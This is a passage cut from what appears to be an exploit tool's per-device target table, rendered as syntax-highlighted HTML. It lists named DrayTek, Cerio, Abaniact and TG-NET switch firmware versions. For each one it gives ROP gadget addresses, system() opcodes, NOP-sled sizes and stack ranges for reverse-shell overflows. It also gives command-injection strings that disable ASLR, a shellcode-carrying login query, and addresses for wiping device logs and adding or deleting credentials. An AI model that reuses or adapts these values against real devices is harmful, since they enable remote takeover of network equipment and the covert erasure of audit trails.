					<span class="token punctuation">}</span><span class="token punctuation">,</span> 
					<span class="token string">'heack_cgi_shell'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'cgi'</span><span class="token punctuation">:</span><span class="token string">'set.cgi'</span><span class="token punctuation">,</span>				<span class="token comment"># /sqfs/home/web/cgi/set.cgi; cgi_home_loginAuth_set()</span>
						<span class="token string">'START'</span><span class="token punctuation">:</span><span class="token number">0x7ffeff04</span><span class="token punctuation">,</span>				<span class="token comment"># start: Stack overflow RA, used for searching NOP sled by blind jump</span>
						<span class="token string">'STOP'</span><span class="token punctuation">:</span><span class="token number">0x7fc60000</span><span class="token punctuation">,</span>				<span class="token comment"># end: You may want to play with this if you dont get it working</span>
						<span class="token string">'usr_nop'</span><span class="token punctuation">:</span> <span class="token number">64</span><span class="token punctuation">,</span>					<span class="token comment"># NOP sled (shellcode will be tailed)</span>
						<span class="token string">'pwd_nop'</span><span class="token punctuation">:</span> <span class="token number">77</span><span class="token punctuation">,</span>					<span class="token comment"># filler/garbage (not used for something constructive)</span>
						<span class="token string">'align'</span><span class="token punctuation">:</span> <span class="token number">3</span><span class="token punctuation">,</span>						<span class="token comment"># Align opcodes in memory</span>
						<span class="token string">'stack'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>					<span class="token comment"># NOP and shellcode lays on: True = stack, False = Heap</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
			<span class="token punctuation">}</span><span class="token punctuation">,</span>

			<span class="token comment">#</span>
			<span class="token comment"># Draytek</span>
			<span class="token comment">#</span>
			<span class="token comment"># CGI Reverse Shell      : Yes</span>
			<span class="token comment"># Boa/Hydra reverse shell: No (cannot point JMP correct into NOP on heap)</span>
			<span class="token comment"># Del /var/log/ram.log   : Yes</span>
			<span class="token comment"># Del /var/log/flash.log : Yes</span>
			<span class="token comment"># Del /mntlog/flash.log  : Yes</span>
			<span class="token comment"># Add credentials        : Yes</span>
			<span class="token comment"># Del credentials        : Yes</span>
			<span class="token comment">#</span>
			<span class="token string">'752-95168'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
				<span class="token string">'template'</span><span class="token punctuation">:</span><span class="token string">'DrayTek'</span><span class="token punctuation">,</span>					<span class="token comment"># Static for the vendor</span>
				<span class="token string">'version'</span><span class="token punctuation">:</span><span class="token string">'2.1.4'</span><span class="token punctuation">,</span>						<span class="token comment"># Version / binary dependent stuff</span>
				<span class="token string">'model'</span><span class="token punctuation">:</span><span class="token string">'VigorSwitch P1100'</span><span class="token punctuation">,</span>  			<span class="token comment">#</span>
				<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'https://www.draytek.com/products/vigorswitch-p1100/'</span><span class="token punctuation">,</span>
				<span class="token string">'exploit'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
					<span class="token string">'heack_hydra_shell'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
														<span class="token comment"># /sqfs/bin/boa; embedparse() </span>
						<span class="token string">'gadget'</span><span class="token punctuation">:</span> <span class="token number">0x40C67C</span><span class="token punctuation">,</span>				<span class="token comment"># Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)</span>
														<span class="token comment"># /sqfs/bin/boa; read_body(); </span>
						<span class="token string">'system'</span><span class="token punctuation">:</span> <span class="token number">0x8f99852c</span><span class="token punctuation">,</span>			<span class="token comment"># la $t9, system # opcode, binary dependent</span>
														<span class="token comment"># /sqfs/bin/boa; read_body(); </span>
						<span class="token string">'handler'</span><span class="token punctuation">:</span> <span class="token number">0x248490ac</span><span class="token punctuation">,</span>			<span class="token comment"># addiu $a0, (.ascii "handler -c boa &amp;" - 0x430000) # (opcode, binary dependent)</span>
						<span class="token string">'v0'</span><span class="token punctuation">:</span> <span class="token number">7</span><span class="token punctuation">,</span>						<span class="token comment"># Should leave as-is (but you can play between 5 - 8)</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_diag'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_add_account'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_del_account'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span> <span class="token comment">#</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_log'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
														<span class="token comment"># /sqfs/home/web/cgi/set.cgi; cgi_log_global_set()</span>
						<span class="token string">'log_settings_set'</span><span class="token punctuation">:</span><span class="token number">0x413E34</span><span class="token punctuation">,</span>	<span class="token comment"># Jump one after 'sw $ra'			# Disable Logging (address, binary dependent)</span>
														<span class="token comment"># /sqfs/home/web/cgi/set.cgi; cgi_log_clear_set()</span>
						<span class="token string">'log_ramClear'</span><span class="token punctuation">:</span><span class="token number">0x413D64</span><span class="token punctuation">,</span>		<span class="token comment"># Jump one after 'sw $ra'			# Clean RAM log (address, binary dependent)</span>
														<span class="token comment"># /sqfs/home/web/cgi/set.cgi; cgi_log_clear_set()</span>
						<span class="token string">'log_fileClear'</span><span class="token punctuation">:</span><span class="token number">0x413D64</span><span class="token punctuation">,</span>		<span class="token comment"># Jump one after 'sw $ra'			# Clean FILE log (address, binary dependent)</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_sntp'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
														<span class="token comment"># /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()</span>
						<span class="token string">'sys_timeSntp_set'</span><span class="token punctuation">:</span><span class="token number">0x410CA8</span><span class="token punctuation">,</span>	<span class="token comment"># Jump one after 'sw $ra'			# Set SNTP Server (Inject RCE)</span>
														<span class="token comment"># /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()</span>
						<span class="token string">'sys_timeSntpDel_set'</span><span class="token punctuation">:</span><span class="token number">0x410CA8</span><span class="token punctuation">,</span>	<span class="token comment"># Jump one after 'sw $ra'			# Delete (address, binary dependent) </span>
														<span class="token comment"># /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()</span>
						<span class="token string">'sys_timeSettings_set'</span><span class="token punctuation">:</span><span class="token number">0x410CA8</span><span class="token punctuation">,</span><span class="token comment"># Jump one after 'sw $ra'			# Enable/Disable (address, binary dependent)</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>				<span class="token comment"># </span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span> 
					<span class="token string">'heack_cgi_shell'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'cgi'</span><span class="token punctuation">:</span><span class="token string">'set.cgi'</span><span class="token punctuation">,</span>				<span class="token comment"># /sqfs/home/web/cgi/set.cgi; cgi_home_loginAuth_set()</span>
						<span class="token string">'START'</span><span class="token punctuation">:</span><span class="token number">0x7ffeff04</span><span class="token punctuation">,</span>				<span class="token comment"># start: Stack overflow RA, used for searching NOP sled by blind jump</span>
						<span class="token string">'STOP'</span><span class="token punctuation">:</span><span class="token number">0x7fc60000</span><span class="token punctuation">,</span>				<span class="token comment"># end: You may want to play with this if you dont get it working</span>
						<span class="token string">'usr_nop'</span><span class="token punctuation">:</span> <span class="token number">64</span><span class="token punctuation">,</span>					<span class="token comment"># NOP sled (shellcode will be tailed)</span>
						<span class="token string">'pwd_nop'</span><span class="token punctuation">:</span> <span class="token number">77</span><span class="token punctuation">,</span>					<span class="token comment"># filler/garbage (not used for something constructive)</span>
						<span class="token string">'align'</span><span class="token punctuation">:</span> <span class="token number">3</span><span class="token punctuation">,</span>						<span class="token comment"># Align opcodes in memory</span>
						<span class="token string">'stack'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>					<span class="token comment"># NOP and shellcode lays on: True = stack, False = Heap</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
			<span class="token punctuation">}</span><span class="token punctuation">,</span>

			<span class="token comment">#</span>
			<span class="token comment"># Cerio</span>
			<span class="token comment">#</span>
			<span class="token comment"># CGI Reverse Shell      : Yes</span>
			<span class="token comment"># Boa/Hydra reverse shell: Yes</span>
			<span class="token comment"># Del /var/log/ram.log   : Yes</span>
			<span class="token comment"># Del /var/log/flash.log : Yes</span>
			<span class="token comment"># Del /mntlog/flash.log  : Yes</span>
			<span class="token comment"># Add credentials        : Yes</span>
			<span class="token comment"># Del credentials        : Yes</span>
			<span class="token comment">#</span>
			<span class="token string">'224-5061'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
				<span class="token string">'template'</span><span class="token punctuation">:</span><span class="token string">'Cerio'</span><span class="token punctuation">,</span>					<span class="token comment"># Static for the vendor</span>
				<span class="token string">'version'</span><span class="token punctuation">:</span><span class="token string">'1.00.29'</span><span class="token punctuation">,</span>				<span class="token comment"># Version / binary dependent stuff</span>
				<span class="token string">'model'</span><span class="token punctuation">:</span><span class="token string">'CS-2424G-24P'</span><span class="token punctuation">,</span>  			<span class="token comment">#</span>
				<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'https://www.cerio.com.tw/eng/switch/poe-switch/cs-2424g-24p/'</span><span class="token punctuation">,</span>
				<span class="token string">'exploit'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
					<span class="token string">'heack_hydra_shell'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
														<span class="token comment"># /sqfs/bin/boa; embedparse() </span>
						<span class="token string">'gadget'</span><span class="token punctuation">:</span> <span class="token number">0x40E6DC</span><span class="token punctuation">,</span>				<span class="token comment"># Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)</span>
														<span class="token comment"># /sqfs/bin/boa; read_body(); </span>
						<span class="token string">'system'</span><span class="token punctuation">:</span> <span class="token number">0x8f998524</span><span class="token punctuation">,</span>			<span class="token comment"># la $t9, system # opcode, binary dependent</span>
														<span class="token comment"># /sqfs/bin/boa; read_body(); </span>
						<span class="token string">'handler'</span><span class="token punctuation">:</span> <span class="token number">0x248411bc</span><span class="token punctuation">,</span>			<span class="token comment"># addiu $a0, (.ascii "handler -c boa &amp;" - 0x430000) # (opcode, binary dependent)</span>
						<span class="token string">'v0'</span><span class="token punctuation">:</span> <span class="token number">7</span><span class="token punctuation">,</span>						<span class="token comment"># Should leave as-is (but you can play between 5 - 8)</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_add_account'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_del_account'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span> <span class="token comment">#</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_diag'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
														<span class="token comment"># /sqfs/home/web/cgi/set.cgi;  cgi_diag_traceroute_set()</span>
						<span class="token string">'sys_ping_post_cmd'</span><span class="token punctuation">:</span><span class="token string">'&amp;srvHost=127.0.0.1 ;echo 0 &gt; /proc/sys/kernel/randomize_va_space;cat /proc/sys/kernel/randomize_va_space &gt; /tmp/check;&amp;count=1'</span><span class="token punctuation">,</span>
						<span class="token string">'sys_ping_post_check'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
						<span class="token string">'web_sys_ping_post'</span><span class="token punctuation">:</span><span class="token number">0x40E114</span><span class="token punctuation">,</span>	<span class="token comment"># Jump one after 'sw $ra'			# (address, binary dependent)</span>

						<span class="token string">'verify_uri'</span><span class="token punctuation">:</span><span class="token string">'/tmp/check'</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>				<span class="token comment"># </span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_log'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
														<span class="token comment"># /sqfs/home/web/cgi/set.cgi; cgi_log_global_set()</span>
						<span class="token string">'log_settings_set'</span><span class="token punctuation">:</span><span class="token number">0x41DB4C</span><span class="token punctuation">,</span>	<span class="token comment"># Jump one after 'sw $ra'			# Disable Logging (address, binary dependent)</span>
														<span class="token comment"># /sqfs/home/web/cgi/set.cgi; cgi_log_clear_set()</span>
						<span class="token string">'log_ramClear'</span><span class="token punctuation">:</span><span class="token number">0x41DA94</span><span class="token punctuation">,</span>		<span class="token comment"># Jump one after 'sw $ra'			# Clean RAM log (address, binary dependent)</span>
														<span class="token comment"># /sqfs/home/web/cgi/set.cgi; cgi_log_clear_set()</span>
						<span class="token string">'log_fileClear'</span><span class="token punctuation">:</span><span class="token number">0x41DA94</span><span class="token punctuation">,</span>		<span class="token comment"># Jump one after 'sw $ra'			# Clean FILE log (address, binary dependent)</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_sntp'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
														<span class="token comment"># /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()</span>
						<span class="token string">'sys_timeSntp_set'</span><span class="token punctuation">:</span><span class="token number">0x415F14</span><span class="token punctuation">,</span>	<span class="token comment"># Jump one after 'sw $ra'			# Set SNTP Server (Inject RCE)</span>
														<span class="token comment"># /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()</span>
						<span class="token string">'sys_timeSntpDel_set'</span><span class="token punctuation">:</span><span class="token number">0x415F14</span><span class="token punctuation">,</span>	<span class="token comment"># Jump one after 'sw $ra'			# Delete (address, binary dependent) </span>
														<span class="token comment"># /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()</span>
						<span class="token string">'sys_timeSettings_set'</span><span class="token punctuation">:</span><span class="token number">0x415F14</span><span class="token punctuation">,</span><span class="token comment"># Jump one after 'sw $ra'			# Enable/Disable (address, binary dependent)</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>			<span class="token comment"># </span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span> 
					<span class="token string">'heack_cgi_shell'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'cgi'</span><span class="token punctuation">:</span><span class="token string">'set.cgi'</span><span class="token punctuation">,</span>				<span class="token comment"># /sqfs/home/web/cgi/set.cgi; cgi_home_loginAuth_set()</span>
						<span class="token string">'START'</span><span class="token punctuation">:</span><span class="token number">0x7ffeff04</span><span class="token punctuation">,</span>				<span class="token comment"># start: Stack overflow RA, used for searching NOP sled by blind jump</span>
						<span class="token string">'STOP'</span><span class="token punctuation">:</span><span class="token number">0x7fc60000</span><span class="token punctuation">,</span>				<span class="token comment"># end: You may want to play with this if you dont get it working</span>
						<span class="token string">'usr_nop'</span><span class="token punctuation">:</span> <span class="token number">64</span><span class="token punctuation">,</span>					<span class="token comment"># NOP sled (shellcode will be tailed)</span>
						<span class="token string">'pwd_nop'</span><span class="token punctuation">:</span> <span class="token number">77</span><span class="token punctuation">,</span>					<span class="token comment"># filler/garbage (not used for something constructive)</span>
						<span class="token string">'align'</span><span class="token punctuation">:</span> <span class="token number">3</span><span class="token punctuation">,</span>						<span class="token comment"># Align opcodes in memory</span>
						<span class="token string">'stack'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>					<span class="token comment"># NOP and shellcode lays on: True = stack, False = Heap</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
			<span class="token punctuation">}</span><span class="token punctuation">,</span>

			<span class="token comment">#</span>
			<span class="token comment"># Abaniact</span>
			<span class="token comment">#</span>
			<span class="token comment"># CGI Reverse Shell      : Yes</span>
			<span class="token comment"># Boa/Hydra reverse shell: Yes</span>
			<span class="token comment"># Del /var/log/ram.log   : Yes</span>
			<span class="token comment"># Del /var/log/flash.log : No</span>
			<span class="token comment"># Del /mntlog/flash.log  : No</span>
			<span class="token comment"># Add credentials        : Yes</span>
			<span class="token comment"># Del credentials        : Yes</span>
			<span class="token comment">#</span>
			<span class="token string">'222-45866'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
				<span class="token string">'template'</span><span class="token punctuation">:</span><span class="token string">'Abaniact'</span><span class="token punctuation">,</span>					<span class="token comment"># Static for the vendor</span>
				<span class="token string">'version'</span><span class="token punctuation">:</span><span class="token string">'116B00033'</span><span class="token punctuation">,</span>				<span class="token comment"># Version / binary dependent stuff</span>
				<span class="token string">'model'</span><span class="token punctuation">:</span><span class="token string">'AML2-PS16-17GP L2'</span><span class="token punctuation">,</span>			<span class="token comment"># Model</span>
				<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'https://www.abaniact.com/L2SW/'</span><span class="token punctuation">,</span>
				<span class="token string">'exploit'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
					<span class="token string">'heack_hydra_shell'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
														<span class="token comment"># /sqfs/bin/boa; embedparse() </span>
						<span class="token string">'gadget'</span><span class="token punctuation">:</span> <span class="token number">0x40E65C</span><span class="token punctuation">,</span>				<span class="token comment"># Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)</span>
														<span class="token comment"># /sqfs/bin/boa; read_body(); </span>
						<span class="token string">'system'</span><span class="token punctuation">:</span> <span class="token number">0x8f998524</span><span class="token punctuation">,</span>			<span class="token comment"># la $t9, system) # opcode, binary dependent</span>
														<span class="token comment"># /sqfs/bin/boa; read_body(); </span>
						<span class="token string">'handler'</span><span class="token punctuation">:</span> <span class="token number">0x2484152c</span><span class="token punctuation">,</span>			<span class="token comment"># addiu $a0, (.ascii "handler -c boa &amp;" - 0x430000) # (opcode, binary dependent)</span>
						<span class="token string">'v0'</span><span class="token punctuation">:</span> <span class="token number">7</span><span class="token punctuation">,</span>						<span class="token comment"># Should leave as-is (but you can play between 5 - 8)</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_add_account'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_del_account'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span> <span class="token comment">#</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_diag'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token comment"># Ping IPv4</span>
						<span class="token comment">#'sys_ping_post_cmd':'ip=127.0.0.1 ;echo 0 &gt; /proc/sys/kernel/randomize_va_space; cat /proc/sys/kernel/randomize_va_space&amp;count=1',</span>
						<span class="token comment">#'verify_uri':'/tmp/pingtest_tmp',</span>
						<span class="token comment">#'web_sys_ping_post':0x4296FC,	# /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_sys_ping_post()</span>

						<span class="token comment"># traceroute</span>
						<span class="token string">'web_sys_ping_post'</span><span class="token punctuation">:</span><span class="token number">0x429F58</span><span class="token punctuation">,</span>	<span class="token comment"># /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_sys_trace_route_post()</span>
						<span class="token string">'sys_ping_post_cmd'</span><span class="token punctuation">:</span><span class="token string">'ip=127.0.0.1 ;echo 0 &gt; /proc/sys/kernel/randomize_va_space;cat /proc/sys/kernel/randomize_va_space &gt; /tmp/traceroute_tmp #&amp;tr_maxhop=30&amp;count=1'</span><span class="token punctuation">,</span>
						<span class="token string">'verify_uri'</span><span class="token punctuation">:</span><span class="token string">'/tmp/traceroute_tmp'</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_log'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_log_setting_post()</span>
						<span class="token string">'log_settings_set'</span><span class="token punctuation">:</span><span class="token number">0x4B4FE4</span><span class="token punctuation">,</span>	<span class="token comment"># Jump one after 'sw $ra'			# Disable Logging (address, binary dependent)</span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_log_file_del()</span>
						<span class="token string">'log_ramClear'</span><span class="token punctuation">:</span><span class="token number">0x4BA5D0</span><span class="token punctuation">,</span>		<span class="token comment"># Jump one after 'sw $ra'			# Clean RAM log (address, binary dependent)</span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_log_file_del()</span>
						<span class="token string">'log_fileClear'</span><span class="token punctuation">:</span><span class="token number">0x4BA5D0</span><span class="token punctuation">,</span>		<span class="token comment"># Jump one after 'sw $ra'			# Clean FILE log (address, binary dependent)</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_sntp_post()</span>
					<span class="token string">'stack_cgi_sntp'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'sys_timeSntp_set'</span><span class="token punctuation">:</span><span class="token number">0x43764C</span><span class="token punctuation">,</span>	<span class="token comment"># Jump one after 'sw $ra'			# Set SNTP Server (Inject CMD)</span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_sntp_post()</span>
						<span class="token string">'sys_timeSntpDel_set'</span><span class="token punctuation">:</span><span class="token number">0x43764C</span><span class="token punctuation">,</span>	<span class="token comment"># Jump one after 'sw $ra'			# Delete (address, binary dependent) </span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_time_post()</span>
						<span class="token string">'sys_timeSettings_set'</span><span class="token punctuation">:</span><span class="token number">0x431CC4</span><span class="token punctuation">,</span><span class="token comment"># Jump one after 'sw $ra'			# Enable/Disable (address, binary dependent)</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span> 
					<span class="token string">'heack_cgi_shell'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'cgi'</span><span class="token punctuation">:</span><span class="token string">'dispatcher.cgi'</span><span class="token punctuation">,</span>			<span class="token comment"># /sqfs/home/web/cgi-bin/dispatcher.cgi; main()</span>
						<span class="token string">'query'</span><span class="token punctuation">:</span><span class="token string">'username=admin&amp;password=_PWDNOP_RA_START&amp;login=1&amp;shellcod=_USRNOP_USRNOP_USRNOP_SHELLCODE'</span><span class="token punctuation">,</span>
						<span class="token string">'START'</span><span class="token punctuation">:</span><span class="token number">0x7ffe6e04</span><span class="token punctuation">,</span>				<span class="token comment"># start: Stack overflow RA, used for searching NOP sled by blind jump</span>
						<span class="token string">'STOP'</span><span class="token punctuation">:</span><span class="token number">0x7fc60000</span><span class="token punctuation">,</span>				<span class="token comment"># end: You may want to play with this if you dont get it working</span>
						<span class="token string">'stack'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>					<span class="token comment"># NOP and shellcode lays on: True = stack, False = Heap</span>
						<span class="token string">'usr_nop'</span><span class="token punctuation">:</span> <span class="token number">53</span><span class="token punctuation">,</span>					<span class="token comment"># NOP sled (shellcode will be tailed)</span>
						<span class="token string">'pwd_nop'</span><span class="token punctuation">:</span> <span class="token number">45</span><span class="token punctuation">,</span>					<span class="token comment"># filler/garbage (not used for something constructive)</span>
						<span class="token string">'align'</span><span class="token punctuation">:</span> <span class="token number">0</span><span class="token punctuation">,</span>						<span class="token comment"># Align opcodes in memory</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'workaround'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>	<span class="token comment"># My LAB workaround</span>

					<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
			<span class="token punctuation">}</span><span class="token punctuation">,</span>

			<span class="token comment">#</span>
			<span class="token comment"># TG-NET Botone Technology Co.,Ltd.</span>
			<span class="token comment"># (Traces in this image: 3One Data Communication, Saitian, Sangfor, Sundray, Gigamedia, GetCK, Hanming Technology)</span>
			<span class="token comment">#</span>
			<span class="token comment"># CGI Reverse Shell      : Yes</span>
			<span class="token comment"># Boa/Hydra reverse shell: Yes</span>
			<span class="token comment"># Del /var/log/ram.log   : Yes</span>
			<span class="token comment"># Del /var/log/flash.log : No</span>
			<span class="token comment"># Del /mntlog/flash.log  : No</span>
			<span class="token comment"># Add credentials        : Yes</span>
			<span class="token comment"># Del credentials        : Yes</span>
			<span class="token comment">#</span>
			<span class="token string">'222-81176'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
				<span class="token string">'template'</span><span class="token punctuation">:</span><span class="token string">'TG-NET'</span><span class="token punctuation">,</span>					<span class="token comment"># Static for the vendor</span>
				<span class="token string">'version'</span><span class="token punctuation">:</span><span class="token string">'3.1.1-R1'</span><span class="token punctuation">,</span>					<span class="token comment"># Version / binary dependent stuff</span>
				<span class="token string">'model'</span><span class="token punctuation">:</span><span class="token string">'P3026M-24POE (V3)'</span><span class="token punctuation">,</span>				<span class="token comment"># Model</span>
				<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'http://www.tg-net.net/productshow.asp?ProdNum=1049&amp;parentid=98'</span><span class="token punctuation">,</span>
				<span class="token string">'exploit'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
					<span class="token string">'heack_hydra_shell'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
														<span class="token comment"># /sqfs/bin/boa; embedparse() </span>
						<span class="token string">'gadget'</span><span class="token punctuation">:</span> <span class="token number">0x40C74C</span><span class="token punctuation">,</span>				<span class="token comment"># Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)</span>
														<span class="token comment"># /sqfs/bin/boa; read_body(); </span>
						<span class="token string">'system'</span><span class="token punctuation">:</span> <span class="token number">0x8f99851c</span><span class="token punctuation">,</span>			<span class="token comment"># la $t9, system) # opcode, binary dependent</span>
														<span class="token comment"># /sqfs/bin/boa; read_body(); </span>
						<span class="token string">'handler'</span><span class="token punctuation">:</span> <span class="token number">0x2484a2d4</span><span class="token punctuation">,</span>			<span class="token comment"># addiu $a0, (.ascii "handler -c boa &amp;" - 0x430000) # (opcode, binary dependent)</span>
						<span class="token string">'v0'</span><span class="token punctuation">:</span> <span class="token number">7</span><span class="token punctuation">,</span>						<span class="token comment"># Should leave as-is (but you can play between 5 - 8)</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_diag'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_add_account'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_del_account'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span> <span class="token comment">#</span>
